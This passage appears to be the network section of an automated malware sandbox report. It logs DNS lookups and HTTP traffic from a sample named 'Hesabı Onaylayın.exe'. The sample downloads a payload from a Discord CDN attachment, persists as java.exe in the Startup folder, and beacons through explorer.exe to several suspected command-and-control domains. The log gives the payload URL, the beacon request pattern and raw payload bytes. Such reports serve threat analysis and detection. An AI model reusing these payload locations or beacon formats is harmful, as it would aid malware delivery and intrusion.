                                                          Feb 7, 2022 12:06:45.696485996 CET6098253192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:06:45.716094017 CET53609828.8.8.8192.168.2.3
                                                          Feb 7, 2022 12:06:50.725255966 CET5805853192.168.2.38.8.8.8
                                                          Feb 7, 2022 12:06:51.096215010 CET53580588.8.8.8192.168.2.3

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Feb 7, 2022 12:02:45.765486002 CET192.168.2.38.8.8.80xc28eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:03:21.481326103 CET192.168.2.38.8.8.80x18faStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:15.859920979 CET192.168.2.38.8.8.80x169fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:18.113322973 CET192.168.2.38.8.8.80xc4dfStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:19.404110909 CET192.168.2.38.8.8.80xd903Standard query (0)www.navairahotels.clubA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:24.586600065 CET192.168.2.38.8.8.80x4880Standard query (0)www.aireapartmentsmsp.comA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:29.851387978 CET192.168.2.38.8.8.80xcd54Standard query (0)www.feasible-weld.comA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:35.449697971 CET192.168.2.38.8.8.80x1f1bStandard query (0)www.athletes4africa.bizA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:40.527426004 CET192.168.2.38.8.8.80x1826Standard query (0)www.sturgisbrews.comA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:45.696485996 CET192.168.2.38.8.8.80x4a3dStandard query (0)www.balderzone.comA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:50.725255966 CET192.168.2.38.8.8.80x5227Standard query (0)www.xn--fiqy4bxlx1tr92f.xn--czru2dA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Feb 7, 2022 12:02:45.784912109 CET8.8.8.8192.168.2.30xc28eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:02:45.784912109 CET8.8.8.8192.168.2.30xc28eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:02:45.784912109 CET8.8.8.8192.168.2.30xc28eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:02:45.784912109 CET8.8.8.8192.168.2.30xc28eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:02:45.784912109 CET8.8.8.8192.168.2.30xc28eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:03:21.502005100 CET8.8.8.8192.168.2.30x18faNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:03:21.502005100 CET8.8.8.8192.168.2.30x18faNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:03:21.502005100 CET8.8.8.8192.168.2.30x18faNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:03:21.502005100 CET8.8.8.8192.168.2.30x18faNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:03:21.502005100 CET8.8.8.8192.168.2.30x18faNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:15.881500959 CET8.8.8.8192.168.2.30x169fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:15.881500959 CET8.8.8.8192.168.2.30x169fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:15.881500959 CET8.8.8.8192.168.2.30x169fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:15.881500959 CET8.8.8.8192.168.2.30x169fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:15.881500959 CET8.8.8.8192.168.2.30x169fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:18.135062933 CET8.8.8.8192.168.2.30xc4dfNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:18.135062933 CET8.8.8.8192.168.2.30xc4dfNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:18.135062933 CET8.8.8.8192.168.2.30xc4dfNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:18.135062933 CET8.8.8.8192.168.2.30xc4dfNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:04:18.135062933 CET8.8.8.8192.168.2.30xc4dfNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:19.426031113 CET8.8.8.8192.168.2.30xd903No error (0)www.navairahotels.clubnavairahotels.clubCNAME (Canonical name)IN (0x0001)
                                                          Feb 7, 2022 12:06:19.426031113 CET8.8.8.8192.168.2.30xd903No error (0)navairahotels.club34.98.99.30A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:24.626717091 CET8.8.8.8192.168.2.30x4880No error (0)www.aireapartmentsmsp.comaireapartmentsmsp.comCNAME (Canonical name)IN (0x0001)
                                                          Feb 7, 2022 12:06:24.626717091 CET8.8.8.8192.168.2.30x4880No error (0)aireapartmentsmsp.com15.197.142.173A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:24.626717091 CET8.8.8.8192.168.2.30x4880No error (0)aireapartmentsmsp.com3.33.152.147A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:29.876291037 CET8.8.8.8192.168.2.30xcd54No error (0)www.feasible-weld.com104.21.21.198A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:29.876291037 CET8.8.8.8192.168.2.30xcd54No error (0)www.feasible-weld.com172.67.200.20A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:35.471623898 CET8.8.8.8192.168.2.30x1f1bNo error (0)www.athletes4africa.biz212.123.41.108A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:40.548983097 CET8.8.8.8192.168.2.30x1826No error (0)www.sturgisbrews.comsturgisbrews.comCNAME (Canonical name)IN (0x0001)
                                                          Feb 7, 2022 12:06:40.548983097 CET8.8.8.8192.168.2.30x1826No error (0)sturgisbrews.com34.102.136.180A (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:45.716094017 CET8.8.8.8192.168.2.30x4a3dName error (3)www.balderzone.comnonenoneA (IP address)IN (0x0001)
                                                          Feb 7, 2022 12:06:51.096215010 CET8.8.8.8192.168.2.30x5227Name error (3)www.xn--fiqy4bxlx1tr92f.xn--czru2dnonenoneA (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • cdn.discordapp.com
                                                          • www.navairahotels.club
                                                          • www.aireapartmentsmsp.com
                                                          • www.feasible-weld.com
                                                          • www.athletes4africa.biz
                                                          • www.sturgisbrews.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.349752162.159.134.233443C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.349755162.159.135.233443C:\Users\user\AppData\Local\Temp\java.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.349811162.159.129.233443C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.349820162.159.134.233443C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.34982234.98.99.3080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Feb 7, 2022 12:06:19.460807085 CET7641OUTGET /g43o/?j0DLG=bAWbi/S+VaXJXK1VOIIWAoiCvWF75BpNHpODYmQiY/o6icgk09bMbNIwGdiM5kcgz4ya&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1
                                                          Host: www.navairahotels.club
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Feb 7, 2022 12:06:19.575987101 CET7641INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Mon, 07 Feb 2022 11:06:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "61ffb800-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.34982315.197.142.17380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Feb 7, 2022 12:06:24.647994995 CET7642OUTGET /g43o/?j0DLG=br5CaOBNbOyEtSl01w1InJFcLjJpKSipTIGKYv8LLz1h7U2pe/W5LRlDNuBFVm8Z7kz1&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1
                                                          Host: www.aireapartmentsmsp.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Feb 7, 2022 12:06:24.844214916 CET7642INHTTP/1.1 403 Forbidden
                                                          Server: awselb/2.0
                                                          Date: Mon, 07 Feb 2022 11:06:24 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 118
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          6192.168.2.349824104.21.21.19880C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Feb 7, 2022 12:06:29.936054945 CET7643OUTGET /g43o/?j0DLG=QkSDkAQwJsfinh3WrOYNwuLRn/wZcwP5ROix40ZEWiTyy9DSEEEXqyK/VjgFco5oKzQL&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1
                                                          Host: www.feasible-weld.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Feb 7, 2022 12:06:30.400813103 CET7644INHTTP/1.1 404 Not Found
                                                          Date: Mon, 07 Feb 2022 11:06:30 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uyjVU1%2BcFL2homc3PICWErLCPXHFjfoTq90GJAcTrSZAhuq8%2FCsxTpwlaV4mYIuHLTJI6nyWsHbsw6VghhsXnf9dJw%2BnoiC5rk%2FzK3NtcCQ7FXFs%2Bl9fSGqh%2B5s9mw6XM%2F9GzQLVInA%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 6d9c26312e65699b-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                          Feb 7, 2022 12:06:30.400840998 CET7644INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          7192.168.2.349825212.123.41.10880C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Feb 7, 2022 12:06:35.490160942 CET7645OUTGET /g43o/?j0DLG=XuLail99yhDrYyUhKwxkqBfGD2vc/Hu9afcS26YM4Nd4m4Phs+vvTj1Fs76Yca0I+p5F&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1
                                                          Host: www.athletes4africa.biz
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Feb 7, 2022 12:06:35.506536007 CET7646INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Mon, 07 Feb 2022 11:02:48 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 875
                                                          Connection: close
                                                          ETag: "5d07e7ed-36b"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6f 6e 20 68 6f 6c 64 20 70 65 6e 64 69 6e 67 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 20 6f 66 20 74 68 65 20 52 65 67 69 73 74 72 61 6e 74 20 61 73 20 70 65 72 20 74 68 65 20 49 43 41 4e 4e 20 72 75 6c 65 73 20 6f 6e 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 0a 3c 70 3e 4d 6f 72 65 20 64 65 74 61 69 6c 73 20 6f 66 20 74 68 65 73 65 20 72 75 6c 65 73 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 61 74 3a 3c 62 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 63 61 6e 6e 2e 6f 72 67 2f 65 6e 2f 72 65 73 6f 75 72 63 65 73 2f 63 6f 6d 70 6c 69 61 6e 63 65 2f 63 6f 6d 70 6c 61 69 6e 74 73 2f 72 65 67 69 73 74 72 61 72 73 2f 63 6f 6e 74 61 63 74 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 69 63 61 6e 6e 2e 6f 72 67 2f 65 6e 2f 72 65 73 6f 75 72 63 65 73 2f 63 6f 6d 70 6c 69 61 6e 63 65 2f 63 6f 6d 70 6c 61 69 6e 74 73 2f 72 65 67 69 73 74 72 61 72 73 2f 63 6f 6e 74 61 63 74 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 61 3e 2e 3c 2f 70 3e 0a 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 70 72 6f 76 69 64 65 72 20 61 6e 64 20 72 65 71 75 65 73 74 20 72 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 72 20 66 6f 6c 6c 6f 77 20 74 68 65 20 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 65 6d 61 69 6c 65 64 20 74 6f 20 79 6f 75 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 79 6f 75 72 20 6f 72 64 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html><head><title>Verification of Contact Information</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>Verification of Contact Information</h1><p>The domain is temporarily on hold pending verification of the email address of the Registrant as per the ICANN rules on Verification of Contact Information.</p><p>More details of these rules can be found at:<br/><a href="http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification">http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification</a>.</p><p>If you are the owner of this domain please contact your provider and request re-verification or follow the instructions emailed to you shortly after your order.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          8192.168.2.34982634.102.136.18080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Feb 7, 2022 12:06:40.568495035 CET7647OUTGET /g43o/?j0DLG=HsquawsfcsgqJ94EtmUD1wYxaBGU5jkWnmyWAJcE1YBxo/BZ5yoFsc9Zh9ltV0MQdvJb&zl_PqJ=KxlpdRmXzNBLJpD0 HTTP/1.1
                                                          Host: www.sturgisbrews.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Feb 7, 2022 12:06:40.683562040 CET7647INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Mon, 07 Feb 2022 11:06:40 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "61ffb800-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.349752162.159.134.233443C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-02-07 11:02:46 UTC0OUTGET /attachments/939413016561205300/939787018140012564/RDi HTTP/1.1
                                                          Host: cdn.discordapp.com
                                                          Connection: Keep-Alive
                                                          2022-02-07 11:02:46 UTC0INHTTP/1.1 200 OK
                                                          Date: Mon, 07 Feb 2022 11:02:46 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 177152
                                                          Connection: close
                                                          CF-Ray: 6d9c20bbfb2f91f9-FRA
                                                          Accept-Ranges: bytes
                                                          Age: 33476
                                                          Cache-Control: public, max-age=31536000
                                                          Content-Disposition: attachment;%20filename=RDi
                                                          ETag: "64a63f332c74248c2e4344632a8f0214"
                                                          Expires: Tue, 07 Feb 2023 11:02:46 GMT
                                                          Last-Modified: Sun, 06 Feb 2022 07:38:05 GMT
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: HIT
                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                          x-goog-generation: 1644133085557986
                                                          x-goog-hash: crc32c=gVbjfA==
                                                          x-goog-hash: md5=ZKY/Myx0JIwuQ0RjKo8CFA==
                                                          x-goog-metageneration: 1
                                                          x-goog-storage-class: STANDARD
                                                          x-goog-stored-content-encoding: identity
                                                          x-goog-stored-content-length: 177152
                                                          X-GUploader-UploadID: ADPycdvd0R5Q2UoyoHe7lECHDxAbymy6zBTQkP5bdNZ-TDlJZejG9tAYVpRmOGbPTyF4hgaq85knqjp-0tygu31FjJ4
                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EHc93pFZJvG%2BK3p1tCTxgPqkSosgkcmEZu%2BaCwNMiLqY7DsP7Jj08EMlymezq8z009ID3GRuVannAwnxw%2Fw8fpGSICETiHUiJNkNDW4pYZc7uoHx4czI3zu%2B9pR5jmwfL19Xeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          2022-02-07 11:02:46 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                          2022-02-07 11:02:46 UTC1INData Raw: 42 35 7f ed ef eb ea e9 ec e7 e6 e5 1b 1c e2 e1 a7 5f df dd dc db da d9 98 d7 d6 d5 d4 d3 d2 d1 2f 4f cf cd cc cb ca c9 c8 c7 c6 c5 c4 c3 c2 c1 3f 3f bf bd bc bb ba b9 b8 b7 b6 b5 34 b3 b2 b1 41 30 15 a3 ac 1f a3 64 89 1f a7 e9 69 82 f6 c9 36 6c bf ed ee f4 fd eb f9 fa b6 f6 f5 fd fc fe 1b 2f ed e8 ac f9 ff e7 a8 ee e8 a5 c0 cc d1 a1 12 90 1b 18 52 76 77 73 5c 77 76 75 74 73 72 71 df aa 6f 6d 20 6a 69 69 05 dc ea 9b 64 63 62 61 9f df 5f 5d bc 5b 58 78 53 56 06 55 54 ff 50 51 af c9 4f 4d 4c 4b 4a 49 46 8c 44 45 44 63 42 41 bf 5f 3d 3d 3c 3b 3a 29 38 17 36 35 34 31 32 31 cb af 2f 2d 2c 2b 2a 29 2e 27 26 25 24 23 22 21 df bf 1c 1d 1c 19 1a 19 18 17 16 15 17 13 72 94 ef 8f 1f 0d 0c 1b 0a 09 08 07 16 05 04 13 02 01 ff 7f ff fd ec fb fa f9 f8 f7 f6 f5 f4 f3 f2
                                                          Data Ascii: B5_/O??4A0di6l/Rvws\wvutsrqom jiidcba_][XxSVUTPQOMLKJIFDEDcBA_==<;:)8654121/-,+*).'&%$#"!r
                                                          2022-02-07 11:02:46 UTC2INData Raw: 0f 93 1d 30 df c8 25 65 1a 9b 0a 6a b3 f3 66 8b 69 8d 14 23 55 10 fc f6 b1 03 b9 6f 44 62 10 6d 1c 26 db 55 7f e0 44 88 3b 68 31 5e 41 00 1b cd 40 c3 4e 82 a5 5c 59 24 79 91 e2 60 e3 92 51 47 eb a8 54 c3 6f a8 29 a5 61 78 fb e1 0f f1 d0 4e 10 f6 14 9c d4 17 fa 43 3b bb 39 d1 d1 79 ff 7c f6 81 c9 52 7d b6 8b 3d ad b7 40 5a 90 1d ab c6 69 95 02 21 9e e1 b3 af 82 1a ee 09 e1 39 8a ae 20 39 59 47 23 73 97 11 0c db e3 1a bd a0 77 38 8a e2 ee 2a 64 20 ad dd 04 de 93 a8 08 d9 d6 6f 8e c1 89 12 3d f6 cb 7d ed f7 00 1a d0 5d eb 86 29 d5 42 61 de a1 f3 ef c2 5a ae 49 a1 79 ca ee 60 f9 99 87 e3 b3 57 d1 cc 1b 23 da 7d 60 b7 f8 4a 22 2e ea a4 e0 6d 1d c4 1e 53 68 c8 19 16 af 4e 75 e4 da c7 9d 89 d4 9f 9c c7 dc f3 93 d1 d3 11 42 02 62 c0 b8 1c f1 bb 7a 0b 22 c1 40 2e
                                                          Data Ascii: 0%ejfi#UoDbm&UD;h1^A@N\Y$y`QGTo)axNC;9y|R}=@Zi!9 9YG#sw8*d o=}])BaZIy`W#}`J".mShNuBbz"@.
